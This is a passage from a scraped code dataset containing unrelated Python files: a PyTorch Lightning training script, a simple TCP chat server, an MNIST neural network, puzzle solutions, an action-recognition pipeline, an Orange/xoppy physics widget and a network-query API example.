u\"\".join(strings)\r\n","sub_path":"src/conditional_template.py","file_name":"conditional_template.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"616949313","text":"import os\nimport json\nimport torch\nimport pytorch_lightning as pl\n\nfrom datetime import datetime\nfrom argparse import ArgumentParser\n\nfrom hip import Transform, TileDataModule, TileModel\n\nMODEL_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\", \"models\")\n\n\ndef tile_train():\n\n # ------------\n # args\n # ------------\n\n parser = ArgumentParser()\n parser.add_argument(\"--cfg\", type=str, default=None)\n parser.add_argument(\"--name\", type=str, default=None)\n parser.add_argument(\"--seed\", type=int, default=1234)\n parser.add_argument(\"--logdir\", type=str, default=\"logs\")\n parser.add_argument(\"--cluster\", action=\"store_true\")\n parser.add_argument(\"--modeldir\", type=str, default=MODEL_DIR)\n parser = pl.Trainer.add_argparse_args(parser)\n parser = TileModel.add_args(parser)\n parser = TileDataModule.add_args(parser)\n hp = parser.parse_args()\n d = vars(hp)\n\n if hp.cfg is not None:\n with open(hp.cfg) as stream:\n d.update(json.load(stream))\n\n ### If you want to save your cfg ###\n # with open(\"my_cfg.json\", 'w') as stream:\n # out = {k: v for k, v in d.items() if not callable(v)}\n # json.dump(out, stream, sort_keys=True, indent=2)\n # print('INFO: CFG WAS SAVED!')\n # return\n\n hp.name = hp.name or os.path.basename(hp.cfg).split(\".\")[0]\n hp.gpus = str(hp.gpus)\n pl.seed_everything(hp.seed)\n\n if hp.cluster:\n hp.root = os.environ[\"DATASET_LOCATION\"]\n hp.logdir = os.environ[\"EXPERIMENT_LOCATION\"]\n hp.progress_bar_refresh_rate = 1000\n hp.gpus = 1\n\n # ------------\n # model\n # ------------\n\n model = TileModel(\n num_classes=hp.num_classes,\n # Optimizer\n lr=hp.lr,\n ls=hp.ls,\n wd=hp.wd,\n threshold=hp.threshold,\n optimizer=hp.optimizer,\n schedule=hp.schedule,\n schedule_step=hp.schedule_step,\n logging_step=hp.logging_step,\n num_warmup_steps=hp.num_warmup_steps,\n # Backbone\n backbone=hp.backbone,\n pretrained=hp.pretrained,\n freeze=hp.freeze,\n unfreeze_blocks=hp.unfreeze_blocks,\n unfreeze_batchnorm=hp.unfreeze_batchnorm,\n dropout=hp.dropout,\n # Pooling\n mil_topk=hp.mil_topk,\n model_dir=hp.modeldir,\n )\n\n # ------------\n # transforms\n # ------------\n\n train_tfms = Transform(model.normalize, model.resize, hp.train_tfms)\n test_tfms = Transform(model.normalize, model.resize, hp.test_tfms)\n model.train_tfms = train_tfms.on_gpu\n model.test_tfms = test_tfms.on_gpu\n\n # ------------\n # data\n # ------------\n\n dm = TileDataModule(\n root=hp.root,\n batch_size=hp.batch_size,\n num_workers=hp.num_workers,\n train_pkl=hp.train_pkl,\n valid_pkl=hp.valid_pkl,\n test_pkl=None,\n train_tfms=train_tfms.on_cpu,\n test_tfms=test_tfms.on_cpu,\n id_column=hp.id_column,\n label_column=hp.label_column,\n tile_column=hp.tile_column,\n split_by=hp.split_by,\n valid_perc=hp.valid_perc,\n distributed=\"ddp\" in (hp.accelerator or \"\"),\n )\n dm.setup(\"fit\")\n\n # ------------\n # training\n # ------------\n\n now = datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n log_path = os.path.join(hp.logdir, hp.name)\n ckpt_dir = os.path.join(log_path, \"ckpts\")\n ckpt_file = f\"{now}-{hp.backbone}\"\n ckpt_file += \"-{step:05d}-{valid_auroc:.2f}\"\n ckpt_file += \"-{valid_loss_epoch_tile:.2f}-{valid_loss_epoch_slide:.2f}\"\n\n lr_monitor = pl.callbacks.lr_monitor.LearningRateMonitor()\n logger = pl.loggers.TensorBoardLogger(log_path, name=None)\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n monitor=\"valid_loss_epoch_slide\",\n dirpath=ckpt_dir,\n filename=ckpt_file,\n save_top_k=1,\n mode=\"min\",\n )\n print(\"\\nDeterminsitic:\", hp.deterministic, \"\\n\")\n trainer = pl.Trainer.from_argparse_args(\n hp,\n logger=logger,\n callbacks=[checkpoint_callback, lr_monitor],\n resume_from_checkpoint=hp.resume_from_checkpoint,\n )\n\n trainer.fit(model, datamodule=dm)\n\n # ------------\n # testing\n # ------------\n\n pass\n\n\nif __name__ == \"__main__\":\n tile_train()\n","sub_path":"code/scripts/tile_train.py","file_name":"tile_train.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"461002089","text":"#coding:utf-8\nfrom __future__ import print_function\nimport socketserver\nfrom threading import Thread\nimport time\n\n\ndef LogPrint(address, data, is_send=0):\n if(is_send == 0):\n print(\"\\rfrom \" + address + \" message : \" + str(data))\n print(\"\\rsend message \" + address + \" : \", end=\"\")\n else:\n print(\"\\rsend message \" + address + \" : \", end=\"\")\n\ndef ListenMessage(conn, td):\n while True:\n time.sleep(1)\n data = conn.recv(1024)\n data = str(data).replace('\\n', '')\n if data != '':\n LogPrint(str(td.client_address[0]), str(data))\n\ndef SendMessage(conn, td):\n while True:\n time.sleep(1)\n message = raw_input()\n if message != '':\n conn.sendall(message + '\\n')\n LogPrint(str(td.client_address[0]), str(message), 1)\n\ndef Console(conn, self, todo):\n if todo == 'listen':\n ListenMessage(conn, self)\n else:\n if todo == 'send':\n SendMessage(conn, self)\n\n\nclass MyServer(socketserver.BaseRequestHandler):\n def handle(self):\n conn = self.request\n conn.sendall('hello,start talking \\n')\n threads = []\n threads.append(Thread(target=Console, args=(conn, self, 'listen')))\n threads.append(Thread(target=Console, args=(conn, self, 'send')))\n for i in range(len(threads)):\n threads[i].start()\n for i in range(len(threads)):\n threads[i].join()\n\n\n\nif __name__ == '__main__':\n print(\"starting socket server......\")\n server = socketserver.ThreadingTCPServer(('0.0.0.0', 8888), MyServer)\n server.serve_forever()","sub_path":"Python Socket/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"576546567","text":"import random\nimport pickle\nimport gzip\nimport numpy as np\n\nclass neural_network():\n\tdef __init__(self, sizes, data_path, epochs, mini_batch_size, learning_rate):\n\t\tself.sizes = sizes\n\t\tself.num_layers = len(sizes)\n\t\tself.weights = [np.random.randn(x, y) for x, y in zip(sizes[1:], sizes[:-1])]\n\t\tself.biases = [np.random.randn(x, 1) for x in sizes[1:]]\n\n\t\tself.data_path = data_path\n\t\tself.epochs = epochs\n\t\tself.mini_batch_size = mini_batch_size\n\t\tself.learning_rate = learning_rate\n\n\t\tself.test_data_size = 0\n\t\tself.training_data_size = 0\n\n\t# all the math functions\n\tdef sigmoid(self, x):\n\t\treturn 1.0 / (1.0 + np.exp(-x))\n\n\tdef sigmoid_derivative(self, x):\n\t\treturn self.sigmoid(x) * (1-self.sigmoid(x))\n\n\tdef vectorize_result(self, x):\n\t\ta = np.zeros((self.sizes[-1], 1))\n\t\ta[x] = 1.0\n\t\treturn a\n\n\tdef cost_derivative_a(self, activation, result):\n\t\t# cost function here is quadratic c = 1/2 * sum(yj - aj)^2\n\t\t# the derivative of it is simply: a_vector - y_vector (the result vector)\n\t\treturn (activation - result)\n\n\t# loading data\n\tdef load_data(self):\n\t\tf = gzip.open(self.data_path, 'rb')\n\t\ttr_d, va_d, te_d = pickle.load(f, encoding='latin1')\n\t\tf.close()\n\n\t\ttraining_inputs = [np.reshape(x, (self.sizes[0], 1)) for x in tr_d[0]]\n\t\ttraining_results = [self.vectorize_result(y) for y in tr_d[1]]\n\t\tvalidation_inputs = [np.reshape(x, (self.sizes[0], 1)) for x in va_d[0]]\n\t\ttest_inputs = [np.reshape(x, (self.sizes[0], 1)) for x in te_d[0]]\n\n\t\ttraining_data = list(zip(training_inputs, training_results))\n\t\ttest_data = list(zip(test_inputs, te_d[1]))\n\n\t\tself.training_data_size = len(training_data)\n\t\tself.test_data_size = len(test_data)\n\n\t\treturn training_data, test_data\n\n\tdef SGD(self):\n\t\ttraining_data, test_data = self.load_data();\n\t\tfor i in range(self.epochs):\n\t\t\tnp.random.shuffle(training_data)\n\t\t\tnp.random.shuffle(test_data)\n\t\t\tmini_batches = self.make_mini_batches(training_data)\n\t\t\t\n\t\t\tfor mini_batch in mini_batches:\n\t\t\t\tdCdb = [np.zeros(b.shape) for b in self.biases]\n\t\t\t\tdCdw = [np.zeros(w.shape) for w in self.weights]\n\t\t\t\tfor activation, result in mini_batch:\t# go through each sample\n\t\t\t\t\tdelta_dCdb, delta_dCdw = self.propagate(activation, result)\n\t\t\t\t\tdCdb = [a+b for a, b in zip(dCdb, delta_dCdb)]\n\t\t\t\t\tdCdw = [a+b for a, b in zip(dCdw, delta_dCdw)]\n\t\t\t\tself.weights = [w-(self.learning_rate/len(mini_batch))*dw for w, dw in zip(self.weights, dCdw)]\n\t\t\t\tself.biases = [b-(self.learning_rate/len(mini_batch))*db for b, db in zip(self.biases, dCdb)]\n\t\t\tcorrect = self.test(test_data)\n\t\t\t# print(correct)\n\t\t\tprint(\"Epoch %d: %d/%d, %4.2f%% accuracy\"% (i+1, correct, self.test_data_size, correct/self.test_data_size*100))\n\t\tprint(\"Complete.\")\n\n\tdef make_mini_batches(self, training_data):\n\t\tmini_batches = [training_data[x : x+self.mini_batch_size] \\\n\t\t\t\t\t\tfor x in range(0, self.training_data_size, self.mini_batch_size)]\n\t\treturn mini_batches\n\n\tdef propagate(self, activation, result):\n\t\ta = activation\n\t\ta_vector = []\n\t\ta_vector.append(a)\t# first, append inputs\n\t\tz_vector = []\n\t\tdCdb = [np.zeros(b.shape) for b in self.biases]\n\t\tdCdw = [np.zeros(w.shape) for w in self.weights]\n\n\t\t# feedforward\n\t\tfor w,b in zip(self.weights, self.biases):\n\t\t\tz = np.dot(w, a) + b\n\t\t\ta = self.sigmoid(z)\n\t\t\tz_vector.append(z)\n\t\t\ta_vector.append(a)\n\n\t\t# output layer error\n\t\terror_L = self.cost_derivative_a(a_vector[-1], result) * self.sigmoid_derivative(z_vector[-1])\n\t\terror = error_L\n\t\t# output layer derivatives calculation\n\t\tdCdb[-1] = error_L\n\t\tdCdw[-1] = np.dot(error_L, a_vector[-2].transpose())\n\n\t\t# error back-propagate\n\t\tfor l in range(self.num_layers-2, 0, -1):\t# l = 1\n\t\t\terror = np.dot(self.weights[l].transpose(), error) * self.sigmoid_derivative(z_vector[l-1])\n\t\t\tdCdb[l-1] = error\n\t\t\tdCdw[l-1] = np.dot(error, a_vector[l-1].transpose())\n\t\treturn dCdb, dCdw\n\n\tdef test(self, test_data):\n\t\tcorrect = 0\n\t\tfor test_inputs, test_results in test_data:\t\t# load test data\n\t\t\ta = test_inputs\n\t\t\tfor w,b in zip(self.weights, self.biases):\n\t\t\t\ta = self.sigmoid(np.dot(w, a)+b)\n\t\t\tif np.argmax(a) == test_results:\n\t\t\t\tcorrect += 1\n\t\treturn correct\n\n\nnet = neural_network([784, 30, 10], 'mnist.pkl.gz', 5, 10, 3.0, );\nnet.SGD()\n","sub_path":"deep_learning/minist_first _lesson/Neural Network 2 Object.py","file_name":"Neural Network 2 Object.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"84645476","text":"import pathlib\nimport math\n\n\ndef get_lcm(n1, n2):\n gcd = math.gcd(n1, n2)\n return (n1 * n2) / gcd\n\n\nfile_name = \"13.txt\"\ncurrent_dir = pathlib.Path(__file__).parent.absolute()\nfile_path = pathlib.Path(current_dir / \"data\" / file_name)\n\nwith open(file_path, \"r\") as file:\n buses = [direction.strip() for direction in file.readlines()]\n\nbus_time_list = [int(bus) if bus != \"x\" else 0 for bus in buses[1].split(\",\")]\nincrement = bus_time_list[0]\nstart_time = increment\n\nsolved = False\nsfi = 1\n\nwhile not solved:\n this_run_ok = True\n if bus_time_list[sfi] != 0:\n current_value = start_time + sfi\n if current_value / bus_time_list[sfi] == current_value // bus_time_list[sfi]:\n print(f\"Solved for {sfi}: start_time :{start_time}\")\n increment = int(get_lcm(bus_time_list[sfi], increment))\n sfi += 1\n if sfi >= len(bus_time_list):\n solved = True\n try:\n while bus_time_list[sfi] == 0:\n sfi += 1\n except IndexError:\n solved = True\n\n else:\n while bus_time_list[sfi] == 0:\n sfi += 1\n\n start_time += increment\n","sub_path":"13_2.py","file_name":"13_2.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"36876899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/4/4 10:02\n# @Author : FebSun\n# @FileName: climbing_stairs.py\n# @Software: PyCharm\n\n# 题干:\n# 假设你正在爬楼梯,需要 n 阶你才能到达楼顶。每次你可以爬 1 或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢?\n# 思路:\n# 假设总共20层,现在张三站在了20层,那么他最后一步,是怎么到达20层的呢?\n# 张三有两种选择:\n# 1、从19层,走一步,到达20层\n# 2、从18层,走两步,到达20层\n# 即stair(20) = stair(19) + stair(18)\n\n\ndef climbing_stairs(n):\n stairs = 0\n if n == 1:\n stairs = 1\n elif n == 2:\n stairs = 2\n else:\n stairs = climbing_stairs(n-1) + climbing_stairs(n -2)\n return stairs\n\n\nif __name__ == \"__main__\":\n print(climbing_stairs(10))\n","sub_path":"recursive_algorithm/climbing_stairs.py","file_name":"climbing_stairs.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"596729219","text":"\"\"\"\nTHIS CODE IMPLEMENTS THE BAG OF FEATURES APPROACH WITH VARIENT WAYS FOR SPATIAL BINNING, ENCODING, POOLING\n\n\"\"\"\n\n__author__ = 'eweiwi'\nimport sys\nsys.path.append('/home/eweiwi/phd_work/toy_experiments/')\n\nfrom MyCode.utils.BofExtractor import BagOfFeatureExtractor\nimport numpy as np\nimport logging\n\nfrom MyCode.Classifier.svm_model_selection import svm_model_report,custom_svm_kernel\n#from MyCode.Classifier.KISSME import *\nimport ast\nfrom sklearn.feature_extraction.text import TfidfTransformer\n\n\nlog = logging.getLogger(__name__)\n\ndef plot_acc (C_s,scores,scores_std):\n import pylab as pl\n pl.figure(1, figsize=(2.5, 2))\n pl.clf()\n pl.axes([.1, .25, .8, .7])\n pl.semilogx(C_s, scores)\n pl.semilogx(C_s, np.array(scores) + np.array(scores_std), 'b--')\n pl.semilogx(C_s, np.array(scores) - np.array(scores_std), 'b--')\n pl.yticks(())\n pl.ylabel('CV score')\n pl.xlabel('Parameter C')\n pl.ylim(0, 1.1)\n #pl.axhline(np.max(scores), linestyle='--', color='.5')\n pl.text(C_s[np.argmax(scores)], .9 * np.max(scores), '%.3f' % np.max(scores),\n verticalalignment='top', horizontalalignment='center',)\n pl.show()\n\ndef spm_classify(tr_data,tr_labels,tst_data,tst_labels,param):\n output_file = 'output_intersection_kernel.txt'\n \n #------------------------------SVM with custom kernel\n custom_svm_kernel(tr_data,tr_labels,tst_data,tst_labels,output_file,param)\n #------------------------------------------------------\n \n #------------------------------SVM with linear or rbf kernel\n svm_model_report(tr_data,tr_labels,tst_data,tst_labels,output_file,param)\n #------------------------------------------------------\n \n #------------------------------KISS ME TEST WITH BOF\n #Kissme_metric(tr_data,tr_labels,tst_data,tst_labels)\n #------------------------------------------------------\n \ndef main(output_file=None,**param):\n \n default_param = {'num_words' :512,\n 'sampling' : 'UNIFORM',\n 'im_size' : None,\n 'pSize' : (24,24),\n 'spacing' : 8,\n 'use_existing_split' : True ,\n 'use_existing_descriptors' : True,\n 'extention' : 'jpg',\n 'cont':'images',\n 'split_ratio' :[0.8,0.2],\n 'encode' : 'LLC',\n 'pool' : 'max', \n 'sp_pyramid':2,\n 'data_structure' : 'dataframe',\n 'feature_type':'hog' ,\n 'cluster_pak':'scipy',\n 'train_test_store_path' : 'train_test_spm.h5',\n 'descriptors_store_path' : 'descriptors_store_spm.h5',\n 'work_path' : '/home/eweiwi/phd_work/toy_experiments/',\n 'raw_data_path' : '/home/eweiwi/phd_work/toy_experiments/datasets/willowactions/',\n 'whiten' : False ,\n 'tfidf' : False,\n 'tr_path':'/home/eweiwi/phd_work/datasets/Action_in_still_images/willowactions/train',\n 'tst_path':'/home/eweiwi/phd_work/datasets/Action_in_still_images/willowactions/test',\n 'use_benchmark_split':True,\n 'max_size':300,\n 'num_of_topics':16}\n if param != {}:\n default_param = param\n action_spm =BagOfFeatureExtractor(**default_param)\n\t\n if action_spm.im_size is not None:\n action_spm.Transform_spatial_pyramid()\n\t\t\n action_spm.Fit_train_test()\n\n #import ipdb; ipdb.set_trace()\n #action_spm.Transform_train_test_data()\n action_spm.Transform_train_data()\n action_spm.Transform_train_patch_features()\n \n action_spm.Transform_train_visual_words()\n action_spm.Transform_document_term(to_transform='train')\n \n #For test samples, transform one by one for memory issues\n tst_data = None\n for tst_im_pth in action_spm.test_structure.Path:\n action_spm.Transform_test_data([tst_im_pth])\n action_spm.Transform_test_patch_features()\n action_spm.Transform_test_visual_words()\n action_spm.Transform_document_term(to_transform='test')\n tst_data = action_spm.test_doc_term if tst_data is None else np.r_[tst_data,action_spm.test_doc_term]\n\t\t\t\t\n \n \n \n \n \n \n \n tr_data = action_spm.doc_term\n #import ipdb; ipdb.set_trace()\n tr_labels = action_spm.train_structure.Action.values\n tst_labels = action_spm.test_structure.Action.values\n \n del action_spm\n import gc\n gc.collect()\n \n #To classify with spm classifier uncomment this line, notice that you should set random_pooling to false\n spm_classify(tr_data,tr_labels,tst_data,tst_labels,default_param)\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n #param_file = 'param_file_willow.txt'\n param_file = None\n output_file = 'output_cluster_change.txt'\n #load parameters file\n if param_file is not None:\n f = open(param_file,'r')\n param_line = 'start'\n #loop over each parameter\n while param_file.strip() != '':\n #pass the paramter to the main\n param_line = f.readline()\n param = ast.literal_eval(param_line)\n main (output_file,**param)\n else:\n main ()\n\n","sub_path":"MyCode/tests/ActionsSpm.py","file_name":"ActionsSpm.py","file_ext":"py","file_size_in_byte":5882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"455142171","text":"import sys\nfrom PyQt4.QtGui import QIntValidator, QDoubleValidator, QApplication, QSizePolicy\nfrom Orange.widgets import widget, gui\nfrom Orange.widgets.settings import Setting\nfrom Orange.data import Table, Domain, ContinuousVariable\nimport numpy as np\n\ntry:\n from orangecontrib.xoppy.util.xoppy_calc import xoppy_doc\nexcept ImportError:\n print(\"Error importing: xoppy_doc\")\n raise\n\ntry:\n from orangecontrib.xoppy.util.xoppy_calc import xoppy_calc_undulator_power_density\nexcept ImportError:\n print(\"compute pressed.\")\n print(\"Error importing: xoppy_calc_undulator_power_density\")\n raise\n\nclass OWundulator_power_density(widget.OWWidget):\n name = \"undulator_power_density\"\n id = \"orange.widgets.dataundulator_power_density\"\n description = \"xoppy application to compute...\"\n icon = \"icons/xoppy_undulator_power_density.png\"\n author = \"create_widget.py\"\n maintainer_email = \"srio@esrf.eu\"\n priority = 10\n category = \"\"\n keywords = [\"xoppy\", \"undulator_power_density\"]\n outputs = [#{\"name\": \"xoppy_data\",\n # \"type\": np.ndarray,\n # \"doc\": \"\"},\n {\"name\": \"xoppy_table\",\n \"type\": Table,\n \"doc\": \"\"},\n {\"name\": \"xoppy_specfile\",\n \"type\": str,\n \"doc\": \"\"}]\n\n #inputs = [{\"name\": \"Name\",\n # \"type\": type,\n # \"handler\": None,\n # \"doc\": \"\"}]\n\n want_main_area = False\n\n ELECTRONENERGY = Setting(6.04)\n ELECTRONENERGYSPREAD = Setting(0.001)\n ELECTRONCURRENT = Setting(0.2)\n ELECTRONBEAMSIZEH = Setting(0.000395)\n ELECTRONBEAMSIZEV = Setting(9.9e-06)\n ELECTRONBEAMDIVERGENCEH = Setting(1.05e-05)\n ELECTRONBEAMDIVERGENCEV = Setting(3.9e-06)\n PERIODID = Setting(0.018)\n NPERIODS = Setting(222)\n KV = Setting(1.68)\n DISTANCE = Setting(30.0)\n GAPH = Setting(0.003)\n GAPV = Setting(0.003)\n HSLITPOINTS = Setting(41)\n VSLITPOINTS = Setting(41)\n METHOD = Setting(0)\n\n\n def __init__(self):\n super().__init__()\n\n box0 = gui.widgetBox(self.controlArea, \" \",orientation=\"horizontal\") \n #widget buttons: compute, set defaults, help\n gui.button(box0, self, \"Compute\", callback=self.compute)\n gui.button(box0, self, \"Defaults\", callback=self.defaults)\n gui.button(box0, self, \"Help\", callback=self.help1)\n self.process_showers()\n box = gui.widgetBox(self.controlArea, \" \",orientation=\"vertical\") \n \n \n idx = -1 \n \n #widget index 0 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONENERGY\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 1 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONENERGYSPREAD\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 2 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONCURRENT\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 3 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMSIZEH\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 4 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMSIZEV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 5 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMDIVERGENCEH\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 6 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"ELECTRONBEAMDIVERGENCEV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 7 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"PERIODID\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 8 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"NPERIODS\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=int, validator=QIntValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 9 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"KV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 10 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"DISTANCE\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 11 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"GAPH\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 12 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"GAPV\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=float, validator=QDoubleValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 13 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"HSLITPOINTS\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=int, validator=QIntValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 14 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.lineEdit(box1, self, \"VSLITPOINTS\",\n label=self.unitLabels()[idx], addSpace=True,\n valueType=int, validator=QIntValidator())\n self.show_at(self.unitFlags()[idx], box1) \n \n #widget index 15 \n idx += 1 \n box1 = gui.widgetBox(box) \n gui.comboBox(box1, self, \"METHOD\",\n label=self.unitLabels()[idx], addSpace=True,\n items=['US', 'URGENT', 'SRW'],\n valueType=int, orientation=\"horizontal\")\n self.show_at(self.unitFlags()[idx], box1) \n\n gui.rubber(self.controlArea)\n\n def unitLabels(self):\n return [\"Electron Energy [GeV]\", \"Electron Energy Spread\", \"Electron Current [A]\", \"Electron Beam Size H [m]\", \"Electron Beam Size V [m]\", \"Electron Beam Divergence H [rad]\", \"Electron Beam Divergence V [rad]\", \"Period ID [m]\", \"Number of periods\", \"Kv [undulator K value vertical field]\", \"Distance to slit [m]\", \"Slit gap H [m]\", \"Slit gap V [m]\", \"Number of slit mesh points in H\", \"Number of slit mesh points in V\", \"calculation code\"]\n\n\n def unitFlags(self):\n return [\"True\", \"self.METHOD != 1\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\", \"True\"]\n\n\n #def unitNames(self):\n # return [\"ELECTRONENERGY\", \"ELECTRONENERGYSPREAD\", \"ELECTRONCURRENT\", \"ELECTRONBEAMSIZEH\", \"ELECTRONBEAMSIZEV\", \"ELECTRONBEAMDIVERGENCEH\", \"ELECTRONBEAMDIVERGENCEV\", \"PERIODID\", \"NPERIODS\", \"KV\", \"DISTANCE\", \"GAPH\", \"GAPV\", \"HSLITPOINTS\", \"VSLITPOINTS\", \"METHOD\"]\n\n\n def compute(self):\n fileName = xoppy_calc_undulator_power_density(ELECTRONENERGY=self.ELECTRONENERGY,ELECTRONENERGYSPREAD=self.ELECTRONENERGYSPREAD,ELECTRONCURRENT=self.ELECTRONCURRENT,ELECTRONBEAMSIZEH=self.ELECTRONBEAMSIZEH,ELECTRONBEAMSIZEV=self.ELECTRONBEAMSIZEV,ELECTRONBEAMDIVERGENCEH=self.ELECTRONBEAMDIVERGENCEH,ELECTRONBEAMDIVERGENCEV=self.ELECTRONBEAMDIVERGENCEV,PERIODID=self.PERIODID,NPERIODS=self.NPERIODS,KV=self.KV,DISTANCE=self.DISTANCE,GAPH=self.GAPH,GAPV=self.GAPV,HSLITPOINTS=self.HSLITPOINTS,VSLITPOINTS=self.VSLITPOINTS,METHOD=self.METHOD)\n #send specfile\n self.send(\"xoppy_specfile\",fileName)\n\n print(\"Loading file: \",fileName)\n #load spec file with one scan, # is comment\n out = np.loadtxt(fileName)\n print(\"data shape: \",out.shape)\n #get labels\n txt = open(fileName).readlines()\n tmp = [ line.find(\"#L\") for line in txt]\n itmp = np.where(np.array(tmp) != (-1))\n labels = txt[itmp[0]].replace(\"#L \",\"\").split(\" \")\n print(\"data labels: \",labels)\n #\n # build and send orange table\n #\n domain = Domain([ ContinuousVariable(i) for i in labels ])\n table = Table.from_numpy(domain, out)\n self.send(\"xoppy_table\",table)\n\n def defaults(self):\n self.resetSettings()\n self.compute()\n return\n\n def help1(self):\n print(\"help pressed.\")\n xoppy_doc('undulator_power_density')\n\n\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = OWundulator_power_density()\n w.show()\n app.exec()\n w.saveSettings()\n","sub_path":"devel/undulators/undulator_power_density.py","file_name":"undulator_power_density.py","file_ext":"py","file_size_in_byte":10299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"136183600","text":"import json\nimport requests\nfrom pprint import PrettyPrinter\npp = pprint.PrettyPrinter(indent=4)\n\nlimit= 10000\noffset = 0\nsnapshot = 304634\nbase64auth = 'your base64 auth combo of user and apikey'\n\nnqe = '''foreach device in network.devices\nforeach line in device.files.config\nforeach child in line.children\nlet match = patternMatch(child.text, `vxlan vlan {vlan:string} flood vtep {ips:(string*)}`)\nwhere isPresent(match)\nselect {\n deviceName: device.name,\n line: child.text,\n vlan: match.vlan,\n ip: match.ips\n}'''\n\nurl = \"https://fwd.app/api/snapshots/%s/nq\" % (snapshot)\nheaders = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Basic %s' %(base64auth)}\npayload = '{\"query\": \"% s\",\"queryOptions\":{\"offset\": %s,\"limit\": %s }}' % (nqe, offset, limit)\npayload = payload.replace('\\n', '\\\\n')\nresponse = requests.request(\"POST\", url, headers=headers, data = payload).json()\npp.pprint (response)\n","sub_path":"examples/nqe-api-vxlanflood.py","file_name":"nqe-api-vxlanflood.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"238894234","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 17 16:08:53 2016\n\n@author: Administrator\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io.wavfile as wav\n\n\ndef TabelasMidRise(nBits, vMax):\n delta = 2.*vMax / 2.**nBits\n vQ = np.arange(-vMax+delta/2., vMax, delta)\n vD = np.arange(-vMax + delta, vMax - delta/2, delta)\n 